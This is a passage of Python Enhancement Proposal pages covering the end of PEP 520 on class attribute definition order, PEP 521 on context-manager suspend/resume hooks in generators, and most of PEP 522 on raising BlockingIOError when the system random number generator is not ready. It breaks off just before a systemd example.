of calling it is used for the class definition namespace.
After the execution completes, the definition namespace is
copied into a new dict. Then the original definition namespace is
discarded. The new copy is stored away as the class’s namespace and
is exposed as __dict__ through a read-only proxy.
The class attribute definition order is represented by the insertion
order of names in the definition namespace. Thus, we can have
access to the definition order by switching the definition namespace
to an ordered mapping, such as collections.OrderedDict. This is
feasible using a metaclass and __prepare__, as described above.
In fact, exactly this is by far the most common use case for using
__prepare__.
At that point, the only missing thing for later access to the
definition order is storing it on the class before the definition
namespace is thrown away. Again, this may be done using a metaclass.
However, this means that the definition order is preserved only for
classes that use such a metaclass. There are two practical problems
with that:
First, it requires the use of a metaclass. Metaclasses introduce an
extra level of complexity to code and in some cases (e.g. conflicts)
are a problem. So reducing the need for them is worth doing when the
opportunity presents itself. PEP 422 and PEP 487 discuss this at
length. We have such an opportunity by using an ordered mapping (e.g.
OrderedDict for CPython at least) for the default class definition
namespace, virtually eliminating the need for __prepare__().
Second, only classes that opt in to using the OrderedDict-based
metaclass will have access to the definition order. This is problematic
for cases where universal access to the definition order is important.
Specification
Part 1:
all classes have a __definition_order__ attribute
__definition_order__ is a tuple of identifiers (or None)
__definition_order__ is always set:
during execution of the class body, the insertion order of names
into the class definition namespace is stored in a tuple
if __definition_order__ is defined in the class body then it
must be a tuple of identifiers or None; any other value
will result in TypeError
classes that do not have a class definition (e.g. builtins) have
their __definition_order__ set to None
classes for which __prepare__() returned something other than
OrderedDict (or a subclass) have their __definition_order__
set to None (except where #2 applies)
Not changing:
dir() will not depend on __definition_order__
descriptors and custom __getattribute__ methods are unconstrained
regarding __definition_order__
Part 2:
the default class definition namespace is now an ordered mapping
(e.g. OrderdDict)
cls.__dict__ does not change, remaining a read-only proxy around
dict
Note that Python implementations which have an ordered dict won’t
need to change anything.
The following code demonstrates roughly equivalent semantics for both
parts 1 and 2:
class Meta(type):
@classmethod
def __prepare__(cls, *args, **kwargs):
return OrderedDict()
class Spam(metaclass=Meta):
ham = None
eggs = 5
__definition_order__ = tuple(locals())
Why a tuple?
Use of a tuple reflects the fact that we are exposing the order in
which attributes on the class were defined. Since the definition
is already complete by the time __definition_order__ is set, the
content and order of the value won’t be changing. Thus we use a type
that communicates that state of immutability.
Why not a read-only attribute?
There are some valid arguments for making __definition_order__
a read-only attribute (like cls.__dict__ is). Most notably, a
read-only attribute conveys the nature of the attribute as “complete”,
which is exactly correct for __definition_order__. Since it
represents the state of a particular one-time event (execution of
the class definition body), allowing the value to be replaced would
reduce confidence that the attribute corresponds to the original class
body. Furthermore, often an immutable-by-default approach helps to
make data easier to reason about.
However, in this case there still isn’t a strong reason to counter
the well-worn precedent found in Python. Per Guido:
I don't see why it needs to be a read-only attribute. There are
very few of those -- in general we let users play around with
things unless we have a hard reason to restrict assignment (e.g.
the interpreter's internal state could be compromised). I don't
see such a hard reason here.
Also, note that a writeable __definition_order__ allows dynamically
created classes (e.g. by Cython) to still have __definition_order__
properly set. That could certainly be handled through specific
class-creation tools, such as type() or the C-API, without the need
to lose the semantics of a read-only attribute. However, with a
writeable attribute it’s a moot point.
Why not “__attribute_order__”?
__definition_order__ is centered on the class definition
body. The use cases for dealing with the class namespace (__dict__)
post-definition are a separate matter. __definition_order__ would
be a significantly misleading name for a feature focused on more than
class definition.
Why not ignore “dunder” names?
Names starting and ending with “__” are reserved for use by the
interpreter. In practice they should not be relevant to the users of
__definition_order__. Instead, for nearly everyone they would only
be clutter, causing the same extra work (filtering out the dunder
names) for the majority. In cases where a dunder name is significant,
the class definition could manually set __definition_order__,
making the common case simpler.
However, leaving dunder names out of __definition_order__ means
that their place in the definition order would be unrecoverably lost.
Dropping dunder names by default may inadvertently cause problems for
classes that use dunder names unconventionally. In this case it’s
better to play it safe and preserve all the names from the class
definition. This isn’t a big problem since it is easy to filter out
dunder names:
(name for name in cls.__definition_order__
if not (name.startswith('__') and name.endswith('__')))
In fact, in some application contexts there may be other criteria on
which similar filtering would be applied, such as ignoring any name
starting with “_”, leaving out all methods, or including only
descriptors. Ultimately dunder names aren’t a special enough case to
be treated exceptionally.
Note that a couple of dunder names (__name__ and __qualname__)
are injected by default by the compiler. So they will be included even
though they are not strictly part of the class definition body.
Why None instead of an empty tuple?
A key objective of adding __definition_order__ is to preserve
information in class definitions which was lost prior to this PEP.
One consequence is that __definition_order__ implies an original
class definition. Using None allows us to clearly distinguish
classes that do not have a definition order. An empty tuple clearly
indicates a class that came from a definition statement but did not
define any attributes there.
Why None instead of not setting the attribute?
The absence of an attribute requires more complex handling than None
does for consumers of __definition_order__.
Why constrain manually set values?
If __definition_order__ is manually set in the class body then it
will be used. We require it to be a tuple of identifiers (or None)
so that consumers of __definition_order__ may have a consistent
expectation for the value. That helps maximize the feature’s
usefulness.
We could also allow an arbitrary iterable for a manually set
__definition_order__ and convert it into a tuple. However, not
all iterables infer a definition order (e.g. set). So we opt in
favor of requiring a tuple.
Why not hide __definition_order__ on non-type objects?
Python doesn’t make much effort to hide class-specific attributes
during lookup on instances of classes. While it may make sense
to consider __definition_order__ a class-only attribute, hidden
during lookup on objects, setting precedent in that regard is
beyond the goals of this PEP.
What about __slots__?
__slots__ will be added to __definition_order__ like any
other name in the class definition body. The actual slot names
will not be added to __definition_order__ since they aren’t
set as names in the definition namespace.
Why is __definition_order__ even necessary?
Since the definition order is not preserved in __dict__, it is
lost once class definition execution completes. Classes could
explicitly set the attribute as the last thing in the body. However,
then independent decorators could only make use of classes that had done
so. Instead, __definition_order__ preserves this one bit of info
from the class body so that it is universally available.
Support for C-API Types
Arguably, most C-defined Python types (e.g. built-in, extension modules)
have a roughly equivalent concept of a definition order. So conceivably
__definition_order__ could be set for such types automatically. This
PEP does not introduce any such support. However, it does not prohibit
it either. However, since __definition_order__ can be set at any
time through normal attribute assignment, it does not need any special
treatment in the C-API.
The specific cases:
builtin types
PyType_Ready
PyType_FromSpec
Compatibility
This PEP does not break backward compatibility, except in the case that
someone relies strictly on dict as the class definition namespace.
This shouldn’t be a problem since issubclass(OrderedDict, dict) is
true.
Changes
In addition to the class syntax, the following expose the new behavior:
builtins.__build_class__
types.prepare_class
types.new_class
Also, the 3-argument form of builtins.type() will allow inclusion
of __definition_order__ in the namespace that gets passed in. It
will be subject to the same constraints as when __definition_order__
is explicitly defined in the class body.
Other Python Implementations
Pending feedback, the impact on Python implementations is expected to
be minimal. All conforming implementations are expected to set
__definition_order__ as described in this PEP.
Implementation
The implementation is found in the
tracker.
Alternatives
An Order-preserving cls.__dict__
Instead of storing the definition order in __definition_order__,
the now-ordered definition namespace could be copied into a new
OrderedDict. This would then be used as the mapping proxied as
__dict__. Doing so would mostly provide the same semantics.
However, using OrderedDict for __dict__ would obscure the
relationship with the definition namespace, making it less useful.
Additionally, (in the case of OrderedDict specifically) doing
this would require significant changes to the semantics of the
concrete dict C-API.
There has been some discussion about moving to a compact dict
implementation which would (mostly) preserve insertion order. However
the lack of an explicit __definition_order__ would still remain
as a pain point.
A “namespace” Keyword Arg for Class Definition
PEP 422
introduced a new “namespace” keyword arg to class definitions
that effectively replaces the need to __prepare__().
However, the proposal was withdrawn in favor of the simpler PEP 487.
A stdlib Metaclass that Implements __prepare__() with OrderedDict
This has all the same problems as writing your own metaclass. The
only advantage is that you don’t have to actually write this
metaclass. So it doesn’t offer any benefit in the context of this
PEP.
Set __definition_order__ at Compile-time
Each class’s __qualname__ is determined at compile-time.
This same concept could be applied to __definition_order__.
The result of composing __definition_order__ at compile-time
would be nearly the same as doing so at run-time.
Comparative implementation difficulty aside, the key difference
would be that at compile-time it would not be practical to
preserve definition order for attributes that are set dynamically
in the class body (e.g. locals()[name] = value). However,
they should still be reflected in the definition order. One
possible resolution would be to require class authors to manually
set __definition_order__ if they define any class attributes
dynamically.
Ultimately, the use of OrderedDict at run-time or compile-time
discovery is almost entirely an implementation detail.
References
Original discussion
Follow-up 1
Follow-up 2
Alyssa (Nick) Coghlan’s concerns about mutability
Copyright
This document has been placed in the public domain.
| Final | PEP 520 – Preserving Class Attribute Definition Order | Standards Track | The class definition syntax is ordered by its very nature. Class
attributes defined there are thus ordered. Aside from helping with
readability, that ordering is sometimes significant. If it were
automatically available outside the class definition then the
attribute order could be used without the need for extra boilerplate
(such as metaclasses or manually enumerating the attribute order).
Given that this information already exists, access to the definition
order of attributes is a reasonable expectation. However, currently
Python does not preserve the attribute order from the class
definition. |
PEP 521 – Managing global context via ‘with’ blocks in generators and coroutines
Author:
Nathaniel J. Smith <njs at pobox.com>
Status:
Withdrawn
Type:
Standards Track
Created:
27-Apr-2015
Python-Version:
3.6
Post-History:
29-Apr-2015
Table of Contents
PEP Withdrawal
Abstract
Specification
Nested blocks
Other changes
Rationale
Alternative approaches
Backwards compatibility
Interaction with PEP 492
References
Copyright
PEP Withdrawal
Withdrawn in favor of PEP 567.
Abstract
While we generally try to avoid global state when possible, there
nonetheless exist a number of situations where it is agreed to be the
best approach. In Python, a standard pattern for handling such cases
is to store the global state in global or thread-local storage, and
then use with blocks to limit modifications of this global state
to a single dynamic scope. Examples where this pattern is used include
the standard library’s warnings.catch_warnings and
decimal.localcontext, NumPy’s numpy.errstate (which exposes
the error-handling settings provided by the IEEE 754 floating point
standard), and the handling of logging context or HTTP request context
in many server application frameworks.
However, there is currently no ergonomic way to manage such local
changes to global state when writing a generator or coroutine. For
example, this code:
def f():
with warnings.catch_warnings():
for x in g():
yield x
may or may not successfully catch warnings raised by g(), and may
or may not inadvertently swallow warnings triggered elsewhere in the
code. The context manager, which was intended to apply only to f
and its callees, ends up having a dynamic scope that encompasses
arbitrary and unpredictable parts of its callers. This problem
becomes particularly acute when writing asynchronous code, where
essentially all functions become coroutines.
Here, we propose to solve this problem by notifying context managers
whenever execution is suspended or resumed within their scope,
allowing them to restrict their effects appropriately.
Specification
Two new, optional, methods are added to the context manager protocol:
__suspend__ and __resume__. If present, these methods will be
called whenever a frame’s execution is suspended or resumed from
within the context of the with block.
More formally, consider the following code:
with EXPR as VAR:
PARTIAL-BLOCK-1
f((yield foo))
PARTIAL-BLOCK-2
Currently this is equivalent to the following code (copied from PEP 343):
mgr = (EXPR)
exit = type(mgr).__exit__ # Not calling it yet
value = type(mgr).__enter__(mgr)
exc = True
try:
try:
VAR = value # Only if "as VAR" is present
PARTIAL-BLOCK-1
f((yield foo))
PARTIAL-BLOCK-2
except:
exc = False
if not exit(mgr, *sys.exc_info()):
raise
finally:
if exc:
exit(mgr, None, None, None)
This PEP proposes to modify with block handling to instead become:
mgr = (EXPR)
exit = type(mgr).__exit__ # Not calling it yet
### --- NEW STUFF ---
if the_block_contains_yield_points: # known statically at compile time
suspend = getattr(type(mgr), "__suspend__", lambda: None)
resume = getattr(type(mgr), "__resume__", lambda: None)
### --- END OF NEW STUFF ---
value = type(mgr).__enter__(mgr)
exc = True
try:
try:
VAR = value # Only if "as VAR" is present
PARTIAL-BLOCK-1
### --- NEW STUFF ---
suspend(mgr)
tmp = yield foo
resume(mgr)
f(tmp)
### --- END OF NEW STUFF ---
PARTIAL-BLOCK-2
except:
exc = False
if not exit(mgr, *sys.exc_info()):
raise
finally:
if exc:
exit(mgr, None, None, None)
Analogous suspend/resume calls are also wrapped around the yield
points embedded inside the yield from, await, async with,
and async for constructs.
Nested blocks
Given this code:
def f():
with OUTER:
with INNER:
yield VALUE
then we perform the following operations in the following sequence:
INNER.__suspend__()
OUTER.__suspend__()
yield VALUE
OUTER.__resume__()
INNER.__resume__()
Note that this ensures that the following is a valid refactoring:
def f():
with OUTER:
yield from g()
def g():
with INNER
yield VALUE
Similarly, with statements with multiple context managers suspend
from right to left, and resume from left to right.
Other changes
Appropriate __suspend__ and __resume__ methods are added to
warnings.catch_warnings and decimal.localcontext.
Rationale
In the abstract, we gave an example of plausible but incorrect code:
def f():
with warnings.catch_warnings():
for x in g():
yield x
To make this correct in current Python, we need to instead write
something like:
def f():
with warnings.catch_warnings():
it = iter(g())
while True:
with warnings.catch_warnings():
try:
x = next(it)
except StopIteration:
break
yield x
OTOH, if this PEP is accepted then the original code will become
correct as-is. Or if this isn’t convincing, then here’s another
example of broken code; fixing it requires even greater gyrations, and
these are left as an exercise for the reader:
async def test_foo_emits_warning():
with warnings.catch_warnings(record=True) as w:
await foo()
assert len(w) == 1
assert "xyzzy" in w[0].message
And notice that this last example isn’t artificial at all – this is
exactly how you write a test that an async/await-using coroutine
correctly raises a warning. Similar issues arise for pretty much any
use of warnings.catch_warnings, decimal.localcontext, or
numpy.errstate in async/await-using code. So there’s clearly a
real problem to solve here, and the growing prominence of async code
makes it increasingly urgent.
Alternative approaches
The main alternative that has been proposed is to create some kind of
“task-local storage”, analogous to “thread-local storage”
[1]. In essence, the idea would be that the
event loop would take care to allocate a new “task namespace” for each
task it schedules, and provide an API to at any given time fetch the
namespace corresponding to the currently executing task. While there
are many details to be worked out [2], the basic
idea seems doable, and it is an especially natural way to handle the
kind of global context that arises at the top-level of async
application frameworks (e.g., setting up context objects in a web
framework). But it also has a number of flaws:
It only solves the problem of managing global state for coroutines
that yield back to an asynchronous event loop. But there
actually isn’t anything about this problem that’s specific to
asyncio – as shown in the examples above, simple generators run
into exactly the same issue.
It creates an unnecessary coupling between event loops and code that
needs to manage global state. Obviously an async web framework needs
to interact with some event loop API anyway, so it’s not a big deal
in that case. But it’s weird that warnings or decimal or
NumPy should have to call into an async library’s API to access
their internal state when they themselves involve no async code.
Worse, since there are multiple event loop APIs in common use, it
isn’t clear how to choose which to integrate with. (This could be
somewhat mitigated by CPython providing a standard API for creating
and switching “task-local domains” that asyncio, Twisted, tornado,
etc. could then work with.)
It’s not at all clear that this can be made acceptably fast. NumPy
has to check the floating point error settings on every single
arithmetic operation. Checking a piece of data in thread-local
storage is absurdly quick, because modern platforms have put massive
resources into optimizing this case (e.g. dedicating a CPU register
for this purpose); calling a method on an event loop to fetch a
handle to a namespace and then doing lookup in that namespace is
much slower.More importantly, this extra cost would be paid on every access to
the global data, even for programs which are not otherwise using an
event loop at all. This PEP’s proposal, by contrast, only affects
code that actually mixes with blocks and yield statements,
meaning that the users who experience the costs are the same users
who also reap the benefits.
On the other hand, such tight integration between task context and the
event loop does potentially allow other features that are beyond the
scope of the current proposal. For example, an event loop could note
which task namespace was in effect when a task called call_soon,
and arrange that the callback when run would have access to the same
task namespace. Whether this is useful, or even well-defined in the
case of cross-thread calls (what does it mean to have task-local
storage accessed from two threads simultaneously?), is left as a
puzzle for event loop implementors to ponder – nothing in this
proposal rules out such enhancements as well. It does seem though
that such features would be useful primarily for state that already
has a tight integration with the event loop – while we might want a
request id to be preserved across call_soon, most people would not
expect:
with warnings.catch_warnings():
loop.call_soon(f)
to result in f being run with warnings disabled, which would be
the result if call_soon preserved global context in general. It’s
also unclear how this would even work given that the warnings context
manager __exit__ would be called before f.
So this PEP takes the position that __suspend__/__resume__
and “task-local storage” are two complementary tools that are both
useful in different circumstances.
Backwards compatibility
Because __suspend__ and __resume__ are optional and default to
no-ops, all existing context managers continue to work exactly as
before.
Speed-wise, this proposal adds additional overhead when entering a
with block (where we must now check for the additional methods;
failed attribute lookup in CPython is rather slow, since it involves
allocating an AttributeError), and additional overhead at
suspension points. Since the position of with blocks and
suspension points is known statically, the compiler can
straightforwardly optimize away this overhead in all cases except
where one actually has a yield inside a with. Furthermore,
because we only do attribute checks for __suspend__ and
__resume__ once at the start of a with block, when these
attributes are undefined then the per-yield overhead can be optimized
down to a single C-level if (frame->needs_suspend_resume_calls) {
... }. Therefore, we expect the overall overhead to be negligible.
Interaction with PEP 492
PEP 492 added new asynchronous context managers, which are like
regular context managers, but instead of having regular methods
__enter__ and __exit__ they have coroutine methods
__aenter__ and __aexit__.
Following this pattern, one might expect this proposal to add
__asuspend__ and __aresume__ coroutine methods. But this
doesn’t make much sense, since the whole point is that __suspend__
should be called before yielding our thread of execution and allowing
other code to run. The only thing we accomplish by making
__asuspend__ a coroutine is to make it possible for
__asuspend__ itself to yield. So either we need to recursively
call __asuspend__ from inside __asuspend__, or else we need to
give up and allow these yields to happen without calling the suspend
callback; either way it defeats the whole point.
Well, with one exception: one possible pattern for coroutine code is
to call yield in order to communicate with the coroutine runner,
but without actually suspending their execution (i.e., the coroutine
might know that the coroutine runner will resume them immediately
after processing the yielded message). An example of this is the
curio.timeout_after async context manager, which yields a special
set_timeout message to the curio kernel, and then the kernel
immediately (synchronously) resumes the coroutine which sent the
message. And from the user point of view, this timeout value acts just
like the kinds of global variables that motivated this PEP. But, there
is a crucal difference: this kind of async context manager is, by
definition, tightly integrated with the coroutine runner. So, the
coroutine runner can take over responsibility for keeping track of
which timeouts apply to which coroutines without any need for this PEP
at all (and this is indeed how curio.timeout_after works).
That leaves two reasonable approaches to handling async context managers:
Add plain __suspend__ and __resume__ methods.
Leave async context managers alone for now until we have more
experience with them.
Either seems plausible, so out of laziness / YAGNI this PEP tentatively
proposes to stick with option (2).
References
[1]
https://groups.google.com/forum/#!topic/python-tulip/zix5HQxtElg
https://github.com/python/asyncio/issues/165
[2]
For example, we would have to decide
whether there is a single task-local namespace shared by all users
(in which case we need a way for multiple third-party libraries to
adjudicate access to this namespace), or else if there are multiple
task-local namespaces, then we need some mechanism for each library
to arrange for their task-local namespaces to be created and
destroyed at appropriate moments. The preliminary patch linked
from the github issue above doesn’t seem to provide any mechanism
for such lifecycle management.
Copyright
This document has been placed in the public domain.
| Withdrawn | PEP 521 – Managing global context via ‘with’ blocks in generators and coroutines | Standards Track | While we generally try to avoid global state when possible, there
nonetheless exist a number of situations where it is agreed to be the
best approach. In Python, a standard pattern for handling such cases
is to store the global state in global or thread-local storage, and
then use with blocks to limit modifications of this global state
to a single dynamic scope. Examples where this pattern is used include
the standard library’s warnings.catch_warnings and
decimal.localcontext, NumPy’s numpy.errstate (which exposes
the error-handling settings provided by the IEEE 754 floating point
standard), and the handling of logging context or HTTP request context
in many server application frameworks. |
PEP 522 – Allow BlockingIOError in security sensitive APIs
Author:
Alyssa Coghlan <ncoghlan at gmail.com>, Nathaniel J. Smith <njs at pobox.com>
Status:
Rejected
Type:
Standards Track
Requires:
506
Created:
16-Jun-2016
Python-Version:
3.6
Resolution:
Security-SIG message
Table of Contents
Abstract
Relationship with other PEPs
PEP Rejection
Changes independent of this PEP
Proposal
Changing os.urandom() on platforms with the getrandom() system call
Adding secrets.wait_for_system_rng()
Limitations on scope
Rationale
Ensuring the secrets module implicitly blocks when needed
Raising BlockingIOError in os.urandom() on Linux
Making secrets.wait_for_system_rng() public
Backwards Compatibility Impact Assessment
Unaffected Applications
Affected security sensitive applications
Affected non-security sensitive applications
Additional Background
Why propose this now?
The cross-platform behaviour of os.urandom()
Problems with the behaviour of /dev/urandom on Linux
Consequences of getrandom() availability for Python
References
Copyright
Abstract
A number of APIs in the standard library that return random values nominally
suitable for use in security sensitive operations currently have an obscure
operating system dependent failure mode that allows them to return values that
are not, in fact, suitable for such operations.
This is due to some operating system kernels (most notably the Linux kernel)
permitting reads from /dev/urandom before the system random number
generator is fully initialized, whereas most other operating systems will
implicitly block on such reads until the random number generator is ready.
For the lower level os.urandom and random.SystemRandom APIs, this PEP
proposes changing such failures in Python 3.6 from the current silent,
hard to detect, and hard to debug, errors to easily detected and debugged errors
by raising BlockingIOError with a suitable error message, allowing
developers the opportunity to unambiguously specify their preferred approach
for handling the situation.
For the new high level secrets API, it proposes to block implicitly if
needed whenever random number is generated by that module, as well as to
expose a new secrets.wait_for_system_rng() function to allow code otherwise
using the low level APIs to explicitly wait for the system random number
generator to be available.
This change will impact any operating system that offers the getrandom()
system call, regardless of whether the default behaviour of the
/dev/urandom device is to return potentially predictable results when the
system random number generator is not ready (e.g. Linux, NetBSD) or to block
(e.g. FreeBSD, Solaris, Illumos). Operating systems that prevent execution of
userspace code prior to the initialization of the system random number
generator, or do not offer the getrandom() syscall, will be entirely
unaffected by the proposed change (e.g. Windows, Mac OS X, OpenBSD).
The new exception or the blocking behaviour in the secrets module would
potentially be encountered in the following situations:
Python code calling these APIs during Linux system initialization
Python code running on improperly initialized Linux systems (e.g. embedded
hardware without adequate sources of entropy to seed the system random number
generator, or Linux VMs that aren’t configured to accept entropy from the
VM host)
Relationship with other PEPs
This PEP depends on the Accepted PEP 506, which adds the secrets module.
This PEP competes with Victor Stinner’s PEP 524, which proposes to make
os.urandom itself implicitly block when the system RNG is not ready.
PEP Rejection
For the reference implementation, Guido rejected this PEP in favour of the
unconditional implicit blocking proposal in PEP 524 (which brings CPython’s
behaviour on Linux into line with its behaviour on other operating systems).
This means any further discussion of appropriate default behaviour for
os.urandom() in system Python installations in Linux distributions should
take place on the respective distro mailing lists, rather than on the upstream
CPython mailing lists.
Changes independent of this PEP
CPython interpreter initialization and random module initialization have
already been updated to gracefully fall back to alternative seeding options if
the system random number generator is not ready.
This PEP does not compete with the proposal in PEP 524 to add an
os.getrandom() API to expose the getrandom syscall on platforms that
offer it. There is sufficient motive for adding that API in the os module’s
role as a thin wrapper around potentially platform dependent operating system
features that it can be added regardless of what happens to the default
behaviour of os.urandom() on these systems.
Proposal
Changing os.urandom() on platforms with the getrandom() system call
This PEP proposes that in Python 3.6+, os.urandom() be updated to call
the getrandom() syscall in non-blocking mode if available and raise
BlockingIOError: system random number generator is not ready; see secrets.token_bytes()
if the kernel reports that the call would block.
This behaviour will then propagate through to the existing
random.SystemRandom, which provides a relatively thin wrapper around
os.urandom() that matches the random.Random() API.
However, the new secrets module introduced by PEP 506 will be updated to
catch the new exception and implicitly wait for the system random number
generator if the exception is ever encountered.
In all cases, as soon as a call to one of these security sensitive APIs
succeeds, all future calls to these APIs in that process will succeed
without blocking (once the operating system random number generator is ready
after system boot, it remains ready).
On Linux and NetBSD, this will replace the previous behaviour of returning
potentially predictable results read from /dev/urandom.
On FreeBSD, Solaris, and Illumos, this will replace the previous behaviour of
implicitly blocking until the system random number generator is ready. However,
it is not clear if these operating systems actually allow userspace code (and
hence Python) to run before the system random number generator is ready.
Note that in all cases, if calling the underlying getrandom() API reports
ENOSYS rather than returning a successful response or reporting EAGAIN,
CPython will continue to fall back to reading from /dev/urandom directly.
Adding secrets.wait_for_system_rng()
A new exception shouldn’t be added without a straightforward recommendation
for how to resolve that error when encountered (however rare encountering
the new error is expected to be in practice). For security sensitive code that
actually does need to use the lower level interfaces to the system random
number generator (rather than the new secrets module), and does receive
live bug reports indicating this is a real problem for the userbase of that
particular application rather than a theoretical one, this PEP’s recommendation
will be to add the following snippet (directly or indirectly) to the
__main__ module:
import secrets
secrets.wait_for_system_rng()
Or, if compatibility with versions prior to Python 3.6 is needed:
try:
import secrets
except ImportError:
pass
else:
secrets.wait_for_system_rng()
Within the secrets module itself, this will then be used in
token_bytes() to block implicitly if the new exception is encountered:
def token_bytes(nbytes=None):
if nbytes is None:
nbytes = DEFAULT_ENTROPY
try:
result = os.urandom(nbytes)
except BlockingIOError:
wait_for_system_rng()
result = os.urandom(nbytes)
return result
Other parts of the module will then be updated to use token_bytes() as
their basic random number generation building block, rather than calling
os.urandom() directly.
Application frameworks covering use cases where access to the system random
number generator is almost certain to be needed (e.g. web frameworks) may
choose to incorporate a call to secrets.wait_for_system_rng() implicitly
into the commands that start the application such that existing calls to
os.urandom() will be guaranteed to never raise the new exception when using
those frameworks.
For cases where the error is encountered for an application which cannot be
modified directly, then the following command can be used to wait for the
system random number generator to initialize before starting that application:
python3 -c "import secrets; secrets.wait_for_system_rng()"
For example, this snippet could be added to a shell script or a systemd
ExecStartPre hook (and may prove useful in reliably waiting for the
system random number generator to be ready, even if the subsequent command
is not itself an application running under Python 3.6)
Given the changes proposed to os.urandom() above, and the inclusion of
an os.getrandom() API on systems that support it, the suggested
implementation of this function would be:
if hasattr(os, "getrandom"):
# os.getrandom() always blocks waiting for the system RNG by default
def wait_for_system_rng():
"""Block waiting for system random number generator to be ready"""
os.getrandom(1)
return
else:
# As far as we know, other platforms will never get BlockingIOError
# below but the implementation makes pessimistic assumptions
def wait_for_system_rng():
"""Block waiting for system random number generator to be ready"""
# If the system RNG is already seeded, don't wait at all
try:
os.urandom(1)
return
except BlockingIOError:
pass
# Avoid the below busy loop if possible
try:
block_on_system_rng = open("/dev/random", "rb")
except FileNotFoundError:
pass
else:
with block_on_system_rng:
block_on_system_rng.read(1)
# Busy loop until the system RNG is ready
while True:
try:
os.urandom(1)
break
except BlockingIOError:
# Only check once per millisecond
time.sleep(0.001)
On systems where it is possible to wait for the system RNG to be ready, this
function will do so without a busy loop if os.getrandom() is defined,
os.urandom() itself implicitly blocks, or the /dev/random device is
available. If the system random number generator is ready, this call is
guaranteed to never block, even if the system’s /dev/random device uses
a design that permits it to block intermittently during normal system operation.
Limitations on scope
No changes are proposed for Windows or Mac OS X systems, as neither of those
platforms provides any mechanism to run Python code before the operating
system random number generator has been initialized. Mac OS X goes so far as
to kernel panic and abort the boot process if it can’t properly initialize the
random number generator (although Apple’s restrictions on the supported
hardware platforms make that exceedingly unlikely in practice).
Similarly, no changes are proposed for other *nix systems that do not offer
the getrandom() syscall. On these systems, os.urandom() will continue
to block waiting for the system random number generator to be initialized.
While other *nix systems that offer a non-blocking API (other than
getrandom()) for requesting random numbers suitable for use in security
sensitive applications could potentially receive a similar update to the one
proposed for getrandom() in this PEP, such changes are out of scope for
this particular proposal.
Python’s behaviour on older versions of affected platforms that do not offer
the new getrandom() syscall will also remain unchanged.
Rationale
Ensuring the secrets module implicitly blocks when needed
This is done to help encourage the meme that arises for folks that want the
simplest possible answer to the right way to generate security sensitive random
numbers to be “Use the secrets module when available or your application might
crash unexpectedly”, rather than the more boilerplate heavy “Always call
secrets.wait_for_system_rng() when available or your application might crash
unexpectedly”.
It’s also done due to the BDFL having a higher tolerance for APIs that might
block unexpectedly than he does for APIs that might throw an unexpected
exception [11].
Raising BlockingIOError in os.urandom() on Linux
For several years now, the security community’s guidance has been to use
os.urandom() (or the random.SystemRandom() wrapper) when implementing
security sensitive operations in Python.
To help improve API discoverability and make it clearer that secrecy and
simulation are not the same problem (even though they both involve
random numbers), PEP 506 collected several of the one line recipes based
on the lower level os.urandom() API into a new secrets module.
However, this guidance has also come with a longstanding caveat: developers
writing security sensitive software at least for Linux, and potentially for
some other *BSD systems, may need to wait until the operating system’s
random number generator is ready before relying on it for security sensitive
operations. This generally only occurs if os.urandom() is read very
early in the system initialization process, or on systems with few sources of
available entropy (e.g. some kinds of virtualized or embedded systems), but
unfortunately the exact conditions that trigger this are difficult to predict,
and when it occurs then there is no direct way for userspace to tell it has
happened without querying operating system specific interfaces.
On *BSD systems (if the particular *BSD variant allows the problem to occur
at all) and potentially also Solaris and Illumos, encountering this situation
means os.urandom() will either block waiting for the system random number
generator to be ready (the associated symptom would be for the affected script
to pause unexpectedly on the first call to os.urandom()) or else will
behave the same way as it does on Linux.
On Linux, in Python versions up to and including Python 3.4, and in
Python 3.5 maintenance versions following Python 3.5.2, there’s no clear
indicator to developers that their software may not be working as expected
when run early in the Linux boot process, or on hardware without good
sources of entropy to seed the operating system’s random number generator: due
to the behaviour of the underlying /dev/urandom device, os.urandom()
on Linux returns a result either way, and it takes extensive statistical
analysis to show that a security vulnerability exists.
By contrast, if BlockingIOError is raised in those situations, then
developers using Python 3.6+ can easily choose their desired behaviour:
Wait for the system RNG at or before application startup (security sensitive)
Switch to using the random module (non-security sensitive)
Making secrets.wait_for_system_rng() public
Earlier versions of this PEP proposed a number of recipes for wrapping
os.urandom() to make it suitable for use in security sensitive use cases.
Discussion of the proposal on the security-sig mailing list prompted the
realization [9] that the core assumption driving the API design in this PEP
was that choosing between letting the exception cause the application to fail,
blocking waiting for the system RNG to be ready and switching to using the
random module instead of os.urandom is an application and use-case
specific decision that should take into account application and use-case
specific details.
There is no way for the interpreter runtime or support libraries to determine
whether a particular use case is security sensitive or not, and while it’s
straightforward for application developer to decide how to handle an exception
thrown by a particular API, they can’t readily workaround an API blocking when
they expected it to be non-blocking.
Accordingly, the PEP was updated to add secrets.wait_for_system_rng() as
an API for applications, scripts and frameworks to use to indicate that they
wanted to ensure the system RNG was available before continuing, while library
developers could continue to call os.urandom() without worrying that it
might unexpectedly start blocking waiting for the system RNG to be available.
Backwards Compatibility Impact Assessment
Similar to PEP 476, this is a proposal to turn a previously silent security
failure into a noisy exception that requires the application developer to
make an explicit decision regarding the behaviour they desire.
As no changes are proposed for operating systems that don’t provide the
getrandom() syscall, os.urandom() retains its existing behaviour as
a nominally blocking API that is non-blocking in practice due to the difficulty
of scheduling Python code to run before the operating system random number
generator is ready. We believe it may be possible to encounter problems akin to
those described in this PEP on at least some *BSD variants, but nobody has
explicitly demonstrated that. On Mac OS X and Windows, it appears to be
straight up impossible to even try to run a Python interpreter that early in
the boot process.
On Linux and other platforms with similar /dev/urandom behaviour,
os.urandom() retains its status as a guaranteed non-blocking API.
However, the means of achieving that status changes in the specific case of
the operating system random number generator not being ready for use in security
sensitive operations: historically it would return potentially predictable
random data, with this PEP it would change to raise BlockingIOError.
Developers of affected applications would then be required to make one of the
following changes to gain forward compatibility with Python 3.6, based on the
kind of application they’re developing.
Unaffected Applications
The following kinds of applications would be entirely unaffected by the change,
regardless of whether or not they perform security sensitive operations:
applications that don’t support Linux
applications that are only run on desktops or conventional servers
applications that are only run after the system RNG is ready (including
those where an application framework calls secrets.wait_for_system_rng()
on their behalf)
Applications in this category simply won’t encounter the new exception, so it
will be reasonable for developers to wait and see if they receive
Python 3.6 compatibility bugs related to the new runtime behaviour, rather than
attempting to pre-emptively determine whether or not they’re affected.
Affected security sensitive applications
Security sensitive applications would need to either change their system
configuration so the application is only started after the operating system
random number generator is ready for security sensitive operations, change the
application startup code to invoke secrets.wait_for_system_rng(), or
else switch to using the new secrets.token_bytes() API.
As an example for components started via a systemd unit file, the following
snippet would delay activation until the system RNG was ready:
